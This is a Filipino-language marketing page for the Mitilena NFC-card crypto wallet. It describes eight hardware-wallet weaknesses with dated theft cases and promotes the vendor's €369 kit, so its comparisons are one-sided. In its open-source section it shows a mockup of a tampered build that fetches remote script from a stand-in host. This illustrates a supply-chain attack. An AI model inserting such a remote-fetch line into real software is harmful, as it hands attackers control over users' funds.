8 butas Open source Checklist FAQ
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Gumawa ng walletGumawa
Hardware wallets · hindi halatang mga butas

Hindi halatang mga butas ng hardware wallet

Bumibili ka ng device para isara ang mga butas. Kasama nito ang mga bago: firmware, update, serbisyo sa computer, screen, kahon, account ng vendor. Walong detalye na tinatawag ng review na bentahe — at walong paraan kung paano kinuha ang pera sa pamamagitan nila noong 2020–2026.

Totoong kaso na may petsa at halaga Mula sa dokumentasyon ng manufacturer Sinusukat namin ang aming kit sa parehong listahan
Halaga ng pagkakamalipampublikong kaso
2026Coldcard · mahinang randomness sa firmware$100M+
2025Bybit · pumirma ang mga signer sa hindi nila nakita$1.5B
2024Dark Skippy · tumutulo ang seed sa dalawang pirmapananaliksik
2023Ledger Connect Kit · backdoor sa library$600K
2021Pekeng wallet app sa App Store17,1 BTC
2020Pagtagas ng DB ng customer ng Ledger · phishing nang ilang taon270,000 tao
Walong butas

Bawat detalye na pinupuri sa review ay hiwalay na butas

Isinasara ng hardware wallet ang isang butas: wala nang key sa phone na may internet. Pero hindi bakante ang device. May firmware, update, desktop program, screen, kahon, nagbebenta na may address mo — at bawat detalye ay nagdadagdag ng attack surface na wala noon. Nasa ibaba ang walong ganoong detalye: ano ang sinasabi ng review, paano kinuha ang pera sa pamamagitan nila, paano isara ang butas, at mayroon ba ang detalye sa aming kit.

Butas 01

Firmware na gumagawa ng key mo

Sa mga review: “secure chip — ginagawa ang key sa loob ng device at hindi ito umaalis”

Ang key ay napakalaking random number, at firmware ang gumagawa nito. Isang bug doon — at mas kaunti ang mga key kaysa sa inaakala mo: na-brute-force ang mga ito sa lahat ng may-ari nang sabay, nang walang access sa device, ilang taon pagkatapos bumili. Hindi mahalaga ang chip; nasa itaas nito ang butas.

Kaso
$100M+
Coldcard, Hulyo 2026: isang bug sa firmware build mula 2021 ang tahimik na pumalit sa hardware RNG ng mahina, na may seed mula sa serial ng device at timer. Bumagsak ang lakas ng key sa humigit-kumulang 40 bits; naubos ang 5,000+ address.
Paano isara ang butas
Pwede bang dalhin ang sarili mong randomness: dice rolls, sarili mong phrase. Ang wallet na tumatanggap ng entropy mula sa iyo ay hindi umaasa sa iisang bug ng firmware.
Wala sa amin ang detalyeng ito
Walang firmware sa card — encrypted carrier ito. Gumagawa ang Mitilena Air ng key mula sa system RNG ng device, at pwede mong itakda ang sarili mong seed phrase sa halip na random words.
Butas 02

Mga update na napipilitan kang i-install

Sa mga review: “regular na nagpapadala ang manufacturer ng security updates”

Bawat update ay sandali kung kailan pwedeng palitan ang firmware. Itinatago ng na-tamper na firmware ang mga fragment ng seed sa dalawa o tatlong ordinaryong pirma habang mukhang normal ang device sa labas. Hindi rin opsyon ang laktawan ang update: isinasara ng parehong update ang mga butas.

Kaso
2 pirma
Dark Skippy, Agosto 2024: ipinakita ng mga mananaliksik na kaya ng malicious firmware ng hardware wallet na kunin ang buong seed sa dalawang transaction. Sapat ang isang update mula sa maling lugar.
Paano isara ang butas
Saan galing ang firmware at sine-verify ba ng device ang pirma nito. Pinakamaganda kung walang dapat i-update.
Wala sa amin ang detalyeng ito
Walang dapat i-update o palitan sa card. Nagaganap ang pagpirma sa phone app; naka-sign ang builds nito at galing sa App Store at Google Play — gaya ng anumang app na nakikita at isinasara mo mismo.
Butas 03 · Damhin ang absurdidad
Sa mga review: “maginhawang desktop app ng vendor”

Wallet para sa kawalan ng tiwala na may kasamang background service

Bumibili ka ng device sa iisang dahilan: para huminto sa pagtitiwala sa computer. Para gumana ito, kailangan mong mag-install ng background service sa parehong computer. Hindi mo ito isinulat, hindi mo sinimulan, at hindi mo kontrolado: nagsisimula ito kasama ang OS, nakikinig sa port na pwedeng tamaan ng anumang program sa machine mo, at may ginagawa ngayon — kung ano eksakto, hindi mo alam at hindi mo kailanman mave-verify.

Patuloy itong tumakbo sa background pagkatapos mong isara ang wallet. Ilang taon. Sa isa sa pinakamalaking vendor, hiwalay na “bridge” service ito; noong 2025 itinago nila sa loob mismo ng app — nandoon pa rin ang service, namamatay lang kasama ang window. Para sa karamihan, kung walang desktop program ang device ay keychain fob lang. Sa Linux magdagdag ng udev rules o hindi ibibigay ng system ang USB.

Kaya ang binili mo para huminto sa pag-asa sa mga program ng computer ay hindi gumagana nang walang program ng computer. At hindi ang nakikita mo — ang tumatakbo sa ilalim nito.

Wala sa amin ang detalyeng ito
Walang naka-install sa computer: walang service, walang driver, walang port. Ang tagapamagitan ay ang NFC chip na nasa phone mo na, gawa ng manufacturer nito at pinamamahalaan ng OS: gumagana lang kapag bukas ang app at ikaw mismo ang nagta-tap ng card, at humihingi ng permiso ang phone sa bawat beses. Passive ang card: walang baterya, walang radio, wala itong ginagawa mag-isa. Isara ang app — walang natitira na tumatakbo nang wala ka. Tapat: kailangan pa rin ang phone app, at gaya ng iba — nakikita mo, binubuksan, at isinasara mo mismo. Walang nakatira sa utility closet.
System monitorWALLET CLOSED
ProcessStateUptime
HW Wallet Appwallet
isinara mo-
hwwalletdbackground service · USB bridge
tumatakbo412d 06:14
sinimulan ng system sa loginhindi maisara — service ito
Mockup; ilustratibo ang mga pangalan. Ganito ang hitsura ng computer na may isa sa pinakasikat na USB wallet bago ang 2025; pagkatapos ay isinama ang “bridge” sa app mismo — parehong service, hindi na lang kita sa listahan.
Alegorya
Bahay para sa privacy — at nangungupahan sa utility closet

Gusto mo ng bahay para sa privacy. Binili mo. Kailangan mo ng seguridad — na-install. At para gumana ang security plan, pinapasok nila ang may uniporme sa bahay na nakatira sa utility closet nang buong oras, may hawak na keys sa bawat pinto, at nag-uulat sa iba. Hindi mo siya inarkila, hindi mo matatanggal, at kung ano ang ginagawa niya sa gabi — hindi mo alam.

“Isa sa atin” siya, siyempre. Nakasulat sa kontrata. Gusto mo ng privacy at nakakuha ka ng kapalit: bahay na may nangungupahan na hindi mo pinili.

Butas 04 · Hindi audit ang open source
Sa mga review: “open source — kahit sino pwedeng mag-verify”

Paraan ng magkasamang trabaho ng mga programmer ang open source, hindi badge na hindi ninanakaw ng program

Naimbento ang open source para makapagbahagi ng program ang mga tao at ayusin nang magkasama. Bilang tool sa kolaborasyon ay mahusay ito. Hindi ito kailanman seal ng kalidad na “hindi nananakaw ng software na ito ang pera mo,” at ito ang dahilan: hindi mo ginagamit ang source code. Ginagamit mo ang na-download mo.

Sa pagitan ng GitHub repo at ng file sa phone mo ay nakaupo ang build, app store, update, server. Sa alinman sa mga hakbang na iyon pwedeng pumasok ang isang linya sa code na kumukuha ng anuman mula saanman — at wala iyon sa repo. Hindi mo maihahambing ang kopya mo sa source: nagpapadala ang store ng compiled file; ang web wallet ay tumatanggap ng anumang code na piniling ihatid ng server ngayon; tahimik na nag-a-update ang browser extension sa gabi.

Ang “open” ay nangangahulugang may mga taong pwedeng suriin ang isang bersyon sa isang araw. Kung ano ang ginagawa ng kopya mo ngayon — hindi iyon ang ibig sabihin.

Sa repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Sa phone mo · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Isang linya sa build. Wala sa repo, invisible sa store, tumatakbo sa device mo.
Hindi napigilan ng openness ang alinman sa mga kasong ito
Ledger Connect Kit2023
open library sa GitHub; nailathala ang malicious na bersyon sa npm; dosenang site ang nag-load nito nang live sa loob ng oras
Copay / event-stream2018
open wallet; dumating ang backdoor sa dependency na partikular na tumutukoy dito
xz utils2024
open nang dalawampung taon; nakaupo ang backdoor sa mga release hanggang mapansin ng isang engineer na kalahating segundo mas mabagal ang SSH login
Coldcard2026
open-source firmware; limang taong build bug ang pumalit sa hardware RNG ng mahina — na-brute-force ang keys nang walang access sa device, 5,000+ address, $100M+
Ano ang talagang gumagana
Hindi ang pagbabasa ng code ng iba — dalawang check na kaya ng kahit sino. Una, behavior audit: maglagay ng intercepting proxy sa computer, i-route ang app dito, at panoorin kung ano ang ipinapadala nito at saan. Hindi mo kailangang basahin ang code — buong kita ang traffic. Pangalawa, arkitektura kung saan walang nananakaw ang code: kung hindi kailanman nakaupo ang key sa networked device, walang kapangyarihan ang anumang linya sa anumang update — wala itong ipapadala.
Paano namin ginagawa
Iniaalok namin mismo ang una: patakbuhin ang app namin sa proxy, ang web version sa browser DevTools, at suriin ang bawat request. Hindi lilitaw ang signing key at seed; ang tanging caveat ay ang Monero view key — sakop sa pahina ng “paano umaalis ang transfer”. Nasa kit ang pangalawa: isinisilang ang key sa Mitilena Air sa device na walang internet, nabubuhay sa card, at signature lang ang umaabot sa online app — wala nang ipro-proxy doon. At totoo ang offline dito: sa air-gap mode walang koneksyon ang key device — walang cable, walang Bluetooth; pumapasok at lumalabas ang transaction bilang QR code na nakikita mo sa mata. Hindi “malamig” na wallet sa cable na nakasabit sa online computer na may sariling service na nagpapalitan ng kung-ano.
Butas 05

Screen na hindi ipinapakita ang pinipirmahan mo

Sa mga review: “kumpirmahin sa screen ng device — walang kapangyarihan ang virus sa computer”

Napakaliit ang screen, at madalas hash o “contract call” ang ipinapakita, hindi ang address at amount. Kinukumpirma mo ang hindi mo nakikita — at tapat pa rin ang pirma, sa iyo. Nagbibigay ang screen ng pakiramdam ng kontrol na wala naman.

Kaso
$1.5B
Bybit, Pebrero 2025: kinumpirma ng mga signer na may hardware wallet ang transfer na mukhang ordinaryo sa UI. Ipinakita ng mga device ang data na hindi ma-verify ng tao.
Paano isara ang butas
Recipient, amount, at uri ng operasyon sa wika ng tao — hindi hash — at one-button reject.
Paano namin ginagawa
May screen, pero phone screen ito: address, amount, at uri ng request sa salita — transfer, contract call, approval — at Reject button. Para sa malalaking halaga — hiwalay na offline device na tumatanggap ng buong transaction.
Butas 06

Kahon na may seed na

Sa mga review: “dumating sa sealed box na may security seal”

Ang pisikal na device ay nangangahulugang shipping, mga tagapamagitan, at “discount” marketplace. Dumating ang wallet na pre-set, may seed sa slip sa loob. O humihingi ang lookalike app sa store na “ilagay ang seed para i-activate.”

Kaso
17,1 BTC
App Store, 2021: naglagay ang may-ari ng hardware wallet ng seed sa lookalike app at nawala ang 17.1 BTC. Sa parehong taon, pagkatapos ng pagtagas ng DB, pinadalhan ng pekeng device ang mga customer ng Ledger na may liham na “ilipat ang seed mo sa bago.”
Paano isara ang butas
Ikaw mismo ang mag-initialize at huwag gumamit ng seed na dumating na nakasulat. Hindi verification ang seal; verification ay ikaw ang gumawa ng key.
Paano namin ginagawa
Blangko ang mga card sa pagdating: ikaw ang gumagawa ng key at ikaw ang nagsusulat — hindi pwedeng may ready-made seed sa kahon. Galing lang ang app sa App Store at Google Play sa pamamagitan ng link sa site; humihingi ito ng seed sa import at pagpirma lang.
Butas 07

Account ng vendor

Sa mga review: “opisyal na warranty, support, at personal account”

Para bilhin ang device, ibinibigay mo sa manufacturer ang pangalan, email, at shipping address. Nakasalalay na ngayon ang seguridad mo sa database nila. Kung tumagas — ilang taon kang tatanggap ng mensahe na “kumpirmahin ang seed sa bagong device,” minsan may package pa.

Kaso
270,000 tao
Ledger, 2020: tumagas ang data ng 270,000 buyer, kasama ang postal address. Hanggang ngayon ay may email, tawag, at package na humihiling na “i-migrate” ang seed.
Paano isara ang butas
Habang mas kaunti ang alam nila tungkol sa iyo, mas maikli ang vector: bumili nang walang account, support na hindi humihingi ng seed, at ang tuntunin na “magnanakaw lang ang humihingi ng seed.”
Wala sa amin ang detalyeng ito
Gumagana ang wallet nang walang registration — walang account. Address ng shipping lang ang alam ng nagbebenta. Hindi humihingi ng seed ang support o ang app.
Butas 08

Isang device at isang slip ng papel

Sa mga review: “matibay na case, malaking screen, baterya na isang linggo”

Mas maraming parte, mas maraming sira: connector, screen, baterya. Nakasabit ang recovery sa isang seed slip — nabasa, nawala sa lipat, na-photograph “para lang.” Ang pinakakaraniwang dahilan ng pagkawala ay hindi hack.

Kaso
≈20 % BTC
Tinatantiya ng Chainalysis na humigit-kumulang ikalimang bahagi ng lahat ng bitcoin ay tuluyang nawala — karamihan mula sa nawalang keys, hindi hack.
Paano isara ang butas
Ilang kopya ng key ang nasa kahon at sa anong anyo, ano ang mangyayari kung mawala ang device, at mayroon bang pwedeng masira.
Wala sa amin ang detalyeng ito
Walang screen, baterya, o connector — walang masisira. At hindi isang kopya: limang mirror copy sa kahon — dalawang NFC card at tatlong stealth sticker sa waterproof plastic, 10+ taon.
Checklist

Ano ang hindi dapat nasa wallet

Walong detalye para sa walóng butas. Bagay ang listahan sa anumang wallet — hardware, mobile, browser. I-tick ang mayroon sa pinipili mo — at sa amin din.

01
Key na ginawa lang ng softwarenang walang sarili mong randomness — phrase o dice mo
02
Mga update kung saan nabubuhay ang keybawat update ay pagkakataong palitan ang code
03
Service, driver, o port sa computertingnan ang butas 03
04
Badge na “open source” sa halip na arkitekturanakaupo ang key kung saan maaabot ng dayuhang code
05
Screen na nagpapakita ng hash sa halip na address at amountat walang Reject button
06
Seed na dumating na nakasulatsa kahon, sa liham, sa “activation app”
07
Account ng vendorat support na pwedeng humingi ng seed
08
Isang kopya at mga parte na nasisirascreen, baterya, connector, isang slip ng papel
Sa listahang ito, wala sa Ultimate kit ang alinman sa walóng detalye. Sa kahon: 2 NFC card at 3 stealth sticker, Mitilena Air (keys na walang internet) at Mitilena Keys (pagpirma na walang internet). Blangko ang mga card sa pagdating: ikaw ang gumagawa at nag-e-encrypt ng key — hindi factory chip. Nilalaman at presyo →
Ultimate · offline kit

Hindi factory “secure chip” — carrier na ikaw ang nag-e-encrypt

Blangko ang mga card sa pagdating. Ginagawa mo ang key sa Mitilena Air sa phone na walang internet at ikaw ang nagsusulat. Ang pagpirma ay sa Mitilena Keys, offline din: biyahe ng transaction ang QR. Limang magkaparehong kopya sa kahon: 2 NFC card at 3 stealth sticker sa waterproof plastic. 18 network, 20,000+ coins, kasama ang USDT.

Walang naka-install sa computer
Walang firmware, update, screen, o baterya
Transaction papunta sa offline phone — sa sound o QR, walang cable o USB
Gumagana sa libreng Mitilena phone app
Waterproof plastic, 10+ taong shelf life
Worldwide shipping · mitilena-store.com
Mitilena NFC card
Ultimate · offline generation at pagpirma
€369€439
2 NFC card · 3 stealth sticker · Mitilena Air · Mitilena Keys license
Bumili ng Ultimate · €369 Basic at Premium — tingnan ang lahat ng plano
FAQ

Ano ang tinatanong pagkatapos basahin hanggang dito

Mga bentahe at kakulangan ng hardware wallet — maikling bersyon?

Isang malaking bentahe: wala ang key sa phone na may internet. Ang mga kakulangan ay ang walóng detalye sa itaas — bawat isa ay nagdadagdag ng attack surface. Magandang hardware wallet ang may mas kaunting detalye, hindi mas marami.

Paano kung compromised ang phone?

Kapag card sa main phone mo, lumilitaw ang key sa isolated environment sa segundo ng pagpirma — parehong panganib ng anumang phone wallet, mas maikli lang. Para sa mga halagang ikinatatakot mo — pangalawang layer: pumirma sa hiwalay na offline device na inaabot ng transaction sa QR.

Paano kung nanakaw o nawala ang card?

Kung walang password, walang silbi ang card at sticker — plastic lang: naka-encrypt ang key sa mga ito. Napapalitan ang nawalang kopya ng apat pa: dalawang card at tatlong sticker mula sa kahon ay magkakasalamin.

Kailangan bang i-update ang firmware ng hardware wallet?

Kung isinara ng vendor ang butas — oo, at iyon mismo ang sandali kung kailan pwedeng palitan ang firmware: suriin ang source at ang pirma. Ang carrier na walang firmware ay walang ganoong pagpipilian — walang i-update, walang palitan.

Paano ito naiiba sa USB wallet?

Mas kaunting tagapamagitan: walang cable, driver, background service, o desktop program. Isang tagapamagitan — ang NFC chip ng phone mo — at sumasagot ito sa iyo at sa OS, hindi sa vendor ng wallet.

Nangangahulugan bang ligtas ang open source?

Nangangahulugan itong pwedeng suriin ng isang tao, minsan. Hindi ang code ang ginagamit mo kundi ang na-download mo, at hindi mo maihahambing ang isa sa isa. Ang seguridad ay galing sa arkitektura kung saan wala ang key kung saan maaabot ng dayuhang code.

NFC cards na may offline generation at pagpirma

Bumili ng Ultimate · €369 Gumawa ng libreng wallet